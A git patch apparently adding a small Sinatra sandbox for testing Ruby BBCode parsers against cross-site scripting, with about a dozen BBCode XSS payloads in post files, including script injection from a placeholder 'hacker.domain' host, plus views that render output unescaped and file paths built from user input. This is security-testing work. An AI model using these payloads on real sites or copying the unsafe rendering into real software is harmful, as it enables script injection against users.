From c67e390c31cabfb76fdda8dd37e130eb36702bea Mon Sep 17 00:00:00 2001 From: Jordan Orelli Date: Tue, 3 Nov 2015 18:15:25 -0500 Subject: [PATCH] bbcode exploit tester --- Gemfile | 7 +++ bbsandbox.rb | 85 +++++++++++++++++++++++++++++ posts/color-tag-extension-injection | 2 + posts/color-tag-injection | 1 + posts/font-tag-injection | 1 + posts/img-tag-injection | 2 + posts/nested-image-tag-injection | 2 + posts/nested-url-tag-injection | 2 + posts/table-tag-injection | 2 + posts/url-js-injection | 1 + posts/url-tag-injection | 1 + posts/youtube-js-injection | 1 + posts/youtube-to-url-js-injection | 1 + public/alert.js | 2 + views/index.slim | 21 +++++++ views/input.slim | 16 ++++++ views/output.slim | 13 +++++ 17 files changed, 160 insertions(+) create mode 100644 Gemfile create mode 100644 bbsandbox.rb create mode 100644 posts/color-tag-extension-injection create mode 100644 posts/color-tag-injection create mode 100644 posts/font-tag-injection create mode 100644 posts/img-tag-injection create mode 100644 posts/nested-image-tag-injection create mode 100644 posts/nested-url-tag-injection create mode 100644 posts/table-tag-injection create mode 100644 posts/url-js-injection create mode 100644 posts/url-tag-injection create mode 100644 posts/youtube-js-injection create mode 100644 posts/youtube-to-url-js-injection create mode 100644 public/alert.js create mode 100644 views/index.slim create mode 100644 views/input.slim create mode 100644 views/output.slim diff --git a/Gemfile b/Gemfile new file mode 100644 index 0000000..298ba7d --- /dev/null +++ b/Gemfile @@ -0,0 +1,7 @@ +source "http://rubygems.org" + +gem "sinatra" +gem "thin" +gem "slim" +gem "bb-ruby" +gem "ruby-bbcode" diff --git a/bbsandbox.rb b/bbsandbox.rb new file mode 100644 index 0000000..f1cdcbe --- /dev/null +++ b/bbsandbox.rb @@ -0,0 +1,85 @@ +require 'sinatra' +require 'slim' +require 'digest/sha1' +require 'bb-ruby' +require 'ruby-bbcode' + +@@engines = ['bb-ruby', 'ruby-bbcode', 'raw'] + +get '/' do + @posts = list_posts + @engines = @@engines + slim :index +end + +def show_create_page(engine) + get "/#{engine}" do + slim :input + end +end + +def get_post(engine) + get "/#{engine}/:slug" do + body = read_post params[:slug] + @engine = 'bb-ruby' + @slug = params[:slug] + @other_engines = @@engines.select{|e| e != engine} + @bbcode_output = exec_bbcode engine, body + slim :output + end +end + +def exec_bbcode(engine, body) + case engine + when "bb-ruby" + BBRuby.to_html body + when "ruby-bbcode" + RubyBBCode.to_html body + when "raw" + body + else + raise "unknown engine: #{engine}" + end +end + +def create_post(engine) + post "/#{engine}" do + slug = store_post request + redirect to("#{engine}/#{slug}") + end +end + +def setup_dir + begin + Dir.mkdir "posts" + rescue + end +end + +def slugify(title) + title.downcase.strip.split(" ").join('-') +end + +def store_post(request) + setup_dir + title = slugify(request["slug"]) + comment = request["comment"] + File.write "posts/#{title}", comment + title +end + +def read_post(slug) + file = File.open("posts/#{slug}", "r") + file.read +end + +def list_posts + Dir.entries("posts").select{|entry| entry != '.' && entry != '..'} +end + +@@engines.each do |engine| + show_create_page engine + get_post engine + create_post engine +end + diff --git a/posts/color-tag-extension-injection b/posts/color-tag-extension-injection new file mode 100644 index 0000000..0c0d29f --- /dev/null +++ b/posts/color-tag-extension-injection @@ -0,0 +1,2 @@ +[color=#ff0000;xss:expression(alert(String.fromCharCode(88,83,83)));]XSS[/color] + diff --git a/posts/color-tag-injection b/posts/color-tag-injection new file mode 100644 index 0000000..7fb6011 --- /dev/null +++ b/posts/color-tag-injection @@ -0,0 +1 @@ +[color=#ff0000;font-size:100px;]XSS[/color] diff --git a/posts/font-tag-injection b/posts/font-tag-injection new file mode 100644 index 0000000..cadbd4a --- /dev/null +++ b/posts/font-tag-injection @@ -0,0 +1 @@ +[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font] diff --git a/posts/img-tag-injection b/posts/img-tag-injection new file mode 100644 index 0000000..5283f5f --- /dev/null +++ b/posts/img-tag-injection @@ -0,0 +1,2 @@ +[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img] + diff --git a/posts/nested-image-tag-injection b/posts/nested-image-tag-injection new file mode 100644 index 0000000..2c622b6 --- /dev/null +++ b/posts/nested-image-tag-injection @@ -0,0 +1,2 @@ +[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img] + diff --git a/posts/nested-url-tag-injection b/posts/nested-url-tag-injection new file mode 100644 index 0000000..bf35581 --- /dev/null +++ b/posts/nested-url-tag-injection @@ -0,0 +1,2 @@ +[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url] + diff --git a/posts/table-tag-injection b/posts/table-tag-injection new file mode 100644 index 0000000..385235d --- /dev/null +++ b/posts/table-tag-injection @@ -0,0 +1,2 @@ +[table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onmouseover='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table] + diff --git a/posts/url-js-injection b/posts/url-js-injection new file mode 100644 index 0000000..e52a414 --- /dev/null +++ b/posts/url-js-injection @@ -0,0 +1 @@ +[url=javascript:t=document.createElement('script');t.src='/alert.js';document.body.appendChild(t);//]test[/url] diff --git a/posts/url-tag-injection b/posts/url-tag-injection new file mode 100644 index 0000000..d47d154 --- /dev/null +++ b/posts/url-tag-injection @@ -0,0 +1 @@ +[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url] diff --git a/posts/youtube-js-injection b/posts/youtube-js-injection new file mode 100644 index 0000000..8de29ff --- /dev/null +++ b/posts/youtube-js-injection @@ -0,0 +1 @@ +[youtube=javascript:t=document.createElement('script');t.src='alert.js';document.body.appendChild(t);//]test[/youtube] \ No newline at end of file diff --git a/posts/youtube-to-url-js-injection b/posts/youtube-to-url-js-injection new file mode 100644 index 0000000..2228165 --- /dev/null +++ b/posts/youtube-to-url-js-injection @@ -0,0 +1 @@ +[youtube=javascript:t=document.createElement('script');t.src='//hacker.domain/script.js';document.body.appendChild(t);//]test[/url] \ No newline at end of file diff --git a/public/alert.js b/public/alert.js new file mode 100644 index 0000000..34f4296 --- /dev/null +++ b/public/alert.js @@ -0,0 +1,2 @@ +alert("This is an alert. You've been XSSed."); + diff --git a/views/index.slim b/views/index.slim new file mode 100644 index 0000000..1ae5845 --- /dev/null +++ b/views/index.slim @@ -0,0 +1,21 @@ +doctype html +html + head + title pick an engine + body + #content + h1 create a sploit + ul + - @@engines.each do |engine| + li + a href="#{engine}" = engine + #existing + h1 list sploits + table + - @posts.each do |post| + tr + td = post + - @@engines.each do |engine| + td + a href="#{engine}/#{post}" view in #{engine} + diff --git a/views/input.slim b/views/input.slim new file mode 100644 index 0000000..d804125 --- /dev/null +++ b/views/input.slim @@ -0,0 +1,16 @@ +doctype html +html + head + title pwn + body + h1 add your dope sploit + form method='post' name='sploit' + label for='slug' slug + br + input name='slug' type='text' + br + label for='comment' bbcode input + br + textarea name='comment' rows=10 cols=80 + br + input type='submit' diff --git a/views/output.slim b/views/output.slim new file mode 100644 index 0000000..a0e7628 --- /dev/null +++ b/views/output.slim @@ -0,0 +1,13 @@ +doctype html +html + head + title output + body + #content + == @bbcode_output + ul + li + a href="/#{@engine}" try again + - @other_engines.each do |engine| + li + a href="/#{engine}/#{@slug}" view in #{engine}